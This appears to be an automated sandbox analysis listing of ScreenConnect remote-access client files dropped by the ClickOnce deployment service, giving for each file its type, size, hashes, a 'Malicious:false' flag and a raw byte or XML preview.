                                                                                                                                                                                                                                                      SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
                                                                                                                                                                                                                                                      SHA-512:B9133EA853AAF6BB2F5EFD7B65A4559701C37D992D8E9CC79BF181CD8CECF0D436077278DDD87725FB5E59BB2962D0FBC111BF0C7E1C760688D01BA4FA4F003E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................+.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):548352
                                                                                                                                                                                                                                                      Entropy (8bit):6.045519732283216
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6144:YtkHq9BVYKH062PQHz0k4NbuI2Tt1QsEaVQQUzxmj8/lmQpnGGlsGdmACEhHkG5Y:YNpZZasEbJ0OnGGlNkuMHCzzdU
                                                                                                                                                                                                                                                      MD5:D0B5084C680C798B5340D2E61CA5E06C
                                                                                                                                                                                                                                                      SHA1:C4F4DE6B77589A8D853F565C99DEF5DBFB230725
                                                                                                                                                                                                                                                      SHA-256:D933498CD929C57AAB0C3AF908E0FE617213DD67C13E39B2A1D68B8F21849A7A
                                                                                                                                                                                                                                                      SHA-512:E14E32D981F4926FE80A4C45D5DFCDCDC3B78DC63556FFBFB4DCE61C2818E6AA2FD5BACC5734970BDE017AC3FDCF0E24FABCC68C1C99C98A84095394E46391B5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...iB............" ..0..V...........p... ........... ....................................@.................................qp..O.......t............................o..8............................................ ............... ..H............text....T... ...V.................. ..`.rsrc...t............X..............@..@.reloc...............\..............@..B.................p......H........B...,..................To........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1215
                                                                                                                                                                                                                                                      Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                      MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                      SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                      SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                      SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1721856
                                                                                                                                                                                                                                                      Entropy (8bit):6.638253108372186
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24576:qGPFFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTsUTM:DPFJkGYYpT0+TFiH7efP
                                                                                                                                                                                                                                                      MD5:F4E602A8A0FD88FF3FFDAC946C21E567
                                                                                                                                                                                                                                                      SHA1:1B9D9F1581F780485A325A35DCD29A16B213591C
                                                                                                                                                                                                                                                      SHA-256:2AB4FB595844C11F27A54402C37197C96FA8E92FCC5D63B43D4810A4891EFBC7
                                                                                                                                                                                                                                                      SHA-512:6DFFC1EF67CC474FC7DCE358A7E3297EBAB4456B88A3A172F0E4BA65C5EE8DD6F67611296DBC8F478B7A3E2ED714E412A26BEF84D19E1B36AD0754BD693CF00B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..>...........\... ...`....... ...............................o....@.................................?\..O....`..|............................[..8............................................ ............... ..H............text....<... ...>.................. ..`.rsrc...|....`.......@..............@..@.reloc...............D..............@..B................s\......H.......H..................0....[........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1980
                                                                                                                                                                                                                                                      Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                      MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                      SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                      SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                      SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):61216
                                                                                                                                                                                                                                                      Entropy (8bit):6.311801757323114
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:EW/+lo6MOc8IoiKWj8Nv8DtyQ4RE+TC6GAhVby97sxd:ELlo6dcclCyQGGn9G
                                                                                                                                                                                                                                                      MD5:C754141304DE3EBAD8ECEEA033356AD6
                                                                                                                                                                                                                                                      SHA1:6AC5D18F1525878FA83E5A93F606AFC58DC7D949
                                                                                                                                                                                                                                                      SHA-256:B1B8A3AD61C1ECED612C442442CC2CF73E2E4B81ACFC8EDFDB3DDEEBAE1E6D78
                                                                                                                                                                                                                                                      SHA-512:81C3B134A2C7C591607ACAC6F9C7881BF0BC194903339534943D65DF49E904BC7FAEEA2A350A4314E28DB2C913C2183C9D3ECF6CA03EB082F5EA461D1E4A6333
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....P............"...0.................. ........@.. ....................... .......|....@.....................................O....... ............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....*^.(.......a...%...}....*:.(......}....*:.(......}....*:.(......}....*....0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!...*...0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):600864
                                                                                                                                                                                                                                                      Entropy (8bit):6.181289241696816
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12288:CQjDnLlwtFNqDJPeQ66ON3nNFcndYYvavXP:Nmt7KLONdFCdYA+P
                                                                                                                                                                                                                                                      MD5:D95CC7E6F8EC5DDE28E1EFFA58E7AC8D
                                                                                                                                                                                                                                                      SHA1:F288AE509BAE3A0901B727DEBE2CA3153AB77B72
                                                                                                                                                                                                                                                      SHA-256:054260618E077FADCD155C5F37EF3D5745F914ADFE916AE61E8BAFA47F855839
                                                                                                                                                                                                                                                      SHA-512:DC1BF1331B18D0C0E9092A57575A106DFC71CFAE5F9744D6ECACF1F65C3FF8B635737E6F380E7F166DE96E261E79A3C6459DB9D3C8BB524FB7A92DD940847728
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ... ....@.. .......................`...........@.................................5...O.... .................. )...@..........8............................................ ............... ..H............text...X.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................i.......H....... F................................................................{D...*..{E...*V.(F.....}D.....}E...*...0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...*.*.*. }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X*...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N...*..{O...*..{P...*V.(F.....}O.....}P...*.0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...*.*.*. 1.c. )UU.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.config

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):266
                                                                                                                                                                                                                                                      Entropy (8bit):4.842791478883622
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
                                                                                                                                                                                                                                                      MD5:728175E20FFBCEB46760BB5E1112F38B
                                                                                                                                                                                                                                                      SHA1:2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
                                                                                                                                                                                                                                                      SHA-256:87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
                                                                                                                                                                                                                                                      SHA-512:FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2569
                                                                                                                                                                                                                                                      Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                      MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                      SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                      SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                      SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe.manifest

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):17858
                                                                                                                                                                                                                                                      Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                      MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                      SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                      SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                      SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):81696
                                                                                                                                                                                                                                                      Entropy (8bit):5.8611828051677515
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Atygl44gzbJI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7wk7bOxrk:r+kukLd0kv+k
                                                                                                                                                                                                                                                      MD5:66E3A8246447DECC97AB63A3485B8DE4
                                                                                                                                                                                                                                                      SHA1:2630B84AD3328A1E1CAE11CDF1D7CA2AFC5DB607
                                                                                                                                                                                                                                                      SHA-256:04A113517425FA2544367F4D343FB04AEE582E6CF2E387EAA9A92B7303652973
                                                                                                                                                                                                                                                      SHA-512:363BFBD98B5C49CDF7201AA196D1FEA8EAA905EC531E585FB941B246C881390340AB9CA19996564D32A26CADFC46715C48A15A9E2A08E5760F014E65C9220F11
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
